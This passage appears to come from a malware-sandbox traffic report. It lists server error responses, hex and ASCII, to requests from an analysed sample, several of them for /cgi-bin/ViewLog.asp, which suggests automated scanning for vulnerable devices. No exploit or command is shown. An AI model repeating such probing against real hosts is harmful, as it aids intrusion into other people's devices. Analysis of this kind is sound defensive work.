Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Wed, 14 Feb 2024 08:29:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:29:54 GMTContent-Length: 489Content-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 69 73 20 70 6f 77 65 72 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 66 61 74 65 64 69 65 72 2f 66 72 70 22 3e 66 72 70 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 66 72 70 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html><head><title>Not Found</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>The page you requested was not found.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>The server is powered by <a href="https://github.com/fatedier/frp">frp</a>.</p><p><em>Faithfully yours, frp.</em></p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:04 GMTServer: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2Vary: accept-language,accept-charsetContent-Length: 417Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 63 20 50 48 50 2f 37 2e 34 2e 32 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2 Server at 192.168.0.14 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:26:24 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:30:14 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: uvlive/6.4.2 Rev13Connection:closeContent-Length: 0Access-Control-Allow-Origin: *
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 14 Feb 2024 08:30:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html; charset=ISO-8859-1Content-Length: 297Server: Jetty(9.2.25.v20180606)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 3a 20 34 30 34 3c 2f 68 32 3e 0a 3c 70 3e 50 72 6f 62 6c 65 6d 20 61 63 63 65 73 73 69 6e 67 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 2e 20 52 65 61 73 6f 6e 3a 0a 3c 70 72 65 3e 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 72 65 3e 3c 2f 70 3e 0a 3c 68 72 20 2f 3e 3c 69 3e 3c 73 6d 61 6c 6c 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 3c 2f 73 6d 61 6c 6c 3e 3c 2f 69 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 </title></head><body><h2>HTTP ERROR: 404</h2><p>Problem accessing /cgi-bin/ViewLog.asp. Reason:<pre> Not Found</pre></p><hr /><i><small>Powered by Jetty://</small></i></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Web serverDate: Wed, 14 Feb 2024 08:30:28 GMTContent-Type: text/htmlContent-Length: 151Connection: keep-aliveX-Detail: 0x1210, insufficient security levelData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:14:35 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:30:33 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: must-revalidate,no-cache,no-storeContent-Type: text/html;charset=iso-8859-1Content-Length: 382Connection: closeServer: Jetty(9.4.45.v20220203)Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html;charset=UTF-8Content-Length: 0Connection: closeCache-control: no-cache
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlAccept-Ranges: bytesSet-Cookie: HFS_SID_=0.226236936170608; path=/; HttpOnlyContent-Encoding: gzip
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 10:04:38 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundserver: owsdcontent-type: text/htmlcontent-length: 38Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 09:44:19 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainDate: Wed, 14 Feb 2024 08:30:47 GMTContent-Length: 18Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Wed, 14 Feb 2024 08:30:52 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-type: text/htmlContent-Length: 0X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Frame-Options:SAMEORIGINSet-Cookie:Secure; HttpOnlyConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 14 Feb 2024 08:30:53 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:07 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 08:31:07 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 14 Feb 2024 11:31:06 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 193Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: 